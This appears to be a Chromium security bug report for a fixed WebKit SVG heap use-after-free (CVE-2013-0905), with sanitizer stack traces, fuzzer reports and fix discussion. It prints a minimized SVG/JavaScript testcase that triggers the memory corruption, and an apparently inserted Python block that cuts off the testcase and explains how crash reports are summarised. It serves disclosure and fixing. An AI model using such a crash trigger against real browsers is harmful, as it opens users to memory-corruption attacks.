Issue 168982

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Heap-use-after-free in WebCore::SVGAnimateMotionElement::updateAnimationPath

Reported by attek...@gmail.com, Jan 9 2013

Issue description


Repro-file as attachment.

Tested on:

OS: Ubuntu 12.04
Chromium: 26.0.1377.0 (Developer Build 175484)

ASAN-report:

==9976== ERROR: AddressSanitizer: heap-use-after-free on address 0x7fa6645f105c at pc 0x7fa69858da82 bp 0x7fffdda0c370 sp 0x7fffdda0c368
READ of size 4 at 0x7fa6645f105c thread T0 (chrome)
    #0 0x7fa69858da81 in WebCore::SVGAnimateMotionElement::updateAnimationPath() ???:0
    #1 0x7fa6985817a6 in WebCore::SVGMPathElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x7fa6986091be in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
    #3 0x7fa6986091e9 in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
    #4 0x7fa6986091e9 in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
    #5 0x7fa698605602 in void WebCore::Private::addChildNodesToDeletionQueue<WebCore::Node, WebCore::ContainerNode>(WebCore::Node*&, WebCore::Node*&, WebCore::ContainerNode*) ???:0
.
.
.
freed by thread T0 (chrome) here:
    #0 0x7fa693df7682 in operator delete(void*) ??:0
    #1 0x7fa698431c0b in WebCore::SVGSMILElement::disconnectConditions() ???:0
    #2 0x7fa69843c4c6 in WebCore::SVGSMILElement::setTargetElement(WebCore::SVGElement*) ???:0
    #3 0x7fa69859b404 in WebCore::SVGAnimationElement::setTargetElement(WebCore::SVGElement*) ???:0
    #4 0x7fa69843229c in WebCore::SVGSMILElement::buildPendingResource() ???:0
    #5 0x7fa69843b245 in WebCore::SVGSMILElement::svgAttributeChanged(WebCore::QualifiedName const&) ???:0
.
.
.

 
Attachment: chrome-heap-use-after-free-WebCoreSVGAnimateMotionElementupdateAnimationPath-5c29.svg (1.8 KB)
Cc: schenney@chromium.org fmalita@chromium.org pdr@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High OS-All Stability-AddressSanitizer
Status: Available
ClusterFuzz report coming in https://cluster-fuzz.appspot.com/testcase?key=158915162
Summary: Heap-use-after-free in WebCore::SVGAnimateMotionElement::updateAnimationPath (was: Heap-use-after-free in WebCore::SVGAnimateMotionElement::updateAnimationPath)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=158915162

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 4
Crash Address: 0x7f5747325c9c
Crash State:
  - crash stack -
  WebCore::SVGAnimateMotionElement::updateAnimationPath
  WebCore::SVGMPathElement::removedFrom
  - free stack -
  WebCore::SVGSMILElement::disconnectConditions
  WebCore::SVGSMILElement::setTargetElement
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=172728:172836

Minimized Testcase (0.70 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv95NR0-Ybh1K2u3VJupsMqqARZ79CiyVIdvg5P5sw2CNhzQLmASfHJM0CSkhFFK57PsSUNiQ4GwqI-mzT19QltWHZZGKNqPpAsMgu5K5ZwsypXfsAosP7b3VOtTiq9VYCHe8_fN0jutZWDaZv5J0BON02vz-jeo_1u6zrsyoT7trmgITjBM
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">


<path id="curve">

<ellipse >
	<animateMotion id="One">
	</animateMotion>
<animateMotion begin="One.begin+1" id="M">
		<mpath xlink:href="#curve"/>
	</animateMotion>
</ellipse>
<g id="go">
<script><![CDATA[
 svgNS = test0=document.getElementById("go")
 test3=document.getElementById("M")
 test5=document.getElementById("One")
 test14=document.getElementById("curve")

setTimeout(function(){
try{test0.appendChild(test14.cloneNode(true))}catch(e){};
try{test3.appendChild(test0.cloneNode(true))}catch(e){};
},0)

try{test3.replaceChild(test5,test3.firstChild)}catch(e){}
setTimeout(function(){location.reload()},30)
]]></script>
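The ASan report in the description and the ClusterFuzz "Crash State" above carry the same information at different levels of detail: the crash state keeps only the top frames of the crash stack and the free stack, with the allocator frame (operator delete) dropped. As an added illustration, not code from this issue or from ClusterFuzz, the Python below reduces the report from the description to that form; the skip list of allocator frames and the count of two frames per stack are assumptions taken from what the comment shows.

```python
import re

# Constructed sample: the two stacks of the ASan report in the issue description above.
ASAN_REPORT = """\
==9976== ERROR: AddressSanitizer: heap-use-after-free on address 0x7fa6645f105c at pc 0x7fa69858da82 bp 0x7fffdda0c370 sp 0x7fffdda0c368
READ of size 4 at 0x7fa6645f105c thread T0 (chrome)
    #0 0x7fa69858da81 in WebCore::SVGAnimateMotionElement::updateAnimationPath() ???:0
    #1 0x7fa6985817a6 in WebCore::SVGMPathElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x7fa6986091be in WebCore::ChildNodeRemovalNotifier::notifyDescendantRemovedFromDocument(WebCore::ContainerNode*) ???:0
freed by thread T0 (chrome) here:
    #0 0x7fa693df7682 in operator delete(void*) ??:0
    #1 0x7fa698431c0b in WebCore::SVGSMILElement::disconnectConditions() ???:0
    #2 0x7fa69843c4c6 in WebCore::SVGSMILElement::setTargetElement(WebCore::SVGElement*) ???:0
"""

HEADER_RE = re.compile(r"AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+)")
FRAME_RE = re.compile(r"^\s*#\d+\s+0x[0-9a-f]+ in (?P<sym>.+) \S+:\d+$")
# Allocator frames say nothing about the bug and are skipped, which is why the
# free stack in the ClusterFuzz comment starts below operator delete (assumed list).
IGNORED = ("operator delete", "operator new", "free", "malloc")
FRAMES_KEPT = 2  # frames per stack in the crash state on this page (assumed)


def symbol(line):
    """Function name of a stack-frame line without its argument list, or None."""
    m = FRAME_RE.match(line)
    return m.group("sym").split("(", 1)[0].strip() if m else None


def crash_state(report):
    """Reduce an ASan use-after-free report to a ClusterFuzz-style crash state."""
    state = {"crash_type": "", "address": None, "crash_stack": [], "free_stack": []}
    current = None
    for line in report.splitlines():
        header, access = HEADER_RE.search(line), ACCESS_RE.match(line)
        if header:
            state["crash_type"] = header.group("kind").capitalize()
            state["address"] = header.group("addr")
        elif access:  # "READ of size 4": the crash stack follows
            state["crash_type"] += " %s %s" % (access.group("op"), access.group("size"))
            current = "crash_stack"
        elif line.startswith("freed by"):
            current = "free_stack"
        elif line.startswith("previously allocated by"):
            current = None  # the allocation stack is not part of the state
        else:
            sym = symbol(line)
            if current and sym and sym not in IGNORED and len(state[current]) < FRAMES_KEPT:
                state[current].append(sym)
    return state
```

Grouping reports by the returned crash type and frames, rather than by address, is what lets a fuzzing pipeline recognise the same use-after-free across builds.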
Cc: -pdr@chromium.org
Labels: Mstone-24 SecImpacts-Stable SecImpacts-Beta
Owner: pdr@chromium.org
Status: Assigned
Definitely looks like a regression from https://trac.webkit.org/changeset/137509/. Philip, can you please help to take a look? It should affect m24, since we will be or might have already merged 137509 (Security fix).

Comment 4 by pdr@chromium.org, Jan 9 2013

This is me, looking into it now.

Comment 5 by pdr@chromium.org, Jan 10 2013

Having trouble reproing on the mac but I'm pretty sure I see what's wrong. Should have a patch up tomorrow when I get in the office.

Comment 6 by pdr@chromium.org, Jan 10 2013

Status: Started
Filed upstream with a minimized repro: https://bugs.webkit.org/show_bug.cgi?id=106530
friendly ping :)

Comment 8 by pdr@chromium.org, Jan 18 2013

pong.

This one is turning out to be a difficult one and I'm still working on it.
Thanks Philip!
Hey Philip,

I'm following up on all the open high-severity security bugs since Pwnium/Pwn2Own (http://blog.chromium.org/2013/01/show-off-your-security-skills-pwn2own.html) is just around the corner (we're using M25).

How's this one going?

Comment 11 by pdr@chromium.org, Feb 13 2013

Speculative patch up in webkitland.
Labels: -Mstone-24 Mstone-25
moving m24 bugs to m25.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: Fixed
http://trac.webkit.org/changeset/142899

Comment 14 by ClusterFuzz, Feb 16 2013

ClusterFuzz has detected this issue as fixed in range 182694:182726.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=158915162

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 4
Crash Address: 0x7f5747325c9c
Crash State:
  - crash stack -
  WebCore::SVGAnimateMotionElement::updateAnimationPath
  WebCore::SVGMPathElement::removedFrom
  - free stack -
  WebCore::SVGSMILElement::disconnectConditions
  WebCore::SVGSMILElement::setTargetElement
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=172728:172836
Fixed: https://cluster-fuzz.appspot.com/revisions?range=182694:182726

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95NR0-Ybh1K2u3VJupsMqqARZ79CiyVIdvg5P5sw2CNhzQLmASfHJM0CSkhFFK57PsSUNiQ4GwqI-mzT19QltWHZZGKNqPpAsMgu5K5ZwsypXfsAosP7b3VOtTiq9VYCHe8_fN0jutZWDaZv5J0BON02vz-jeo_1u6zrsyoT7trmgITjBM

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged Release-1
M25: http://trac.webkit.org/changeset/143491
Labels: CVE-2013-0905

Comment 18 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -Stability-AddressSanitizer -SecImpacts-Stable -SecImpacts-Beta -Mstone-25 Cr-Content Security-Impact-Beta Security-Severity-High Security-Impact-Stable M-25 Type-Bug-Security Performance-Memory-AddressSanitizer

Comment 19 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 22 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 23 by bugdroid1@chromium.org, Apr 5 2013

Labels: -Cr-Content Cr-Blink
Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Labels: reward-na
Labels: -reward-na reward-ineligible

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
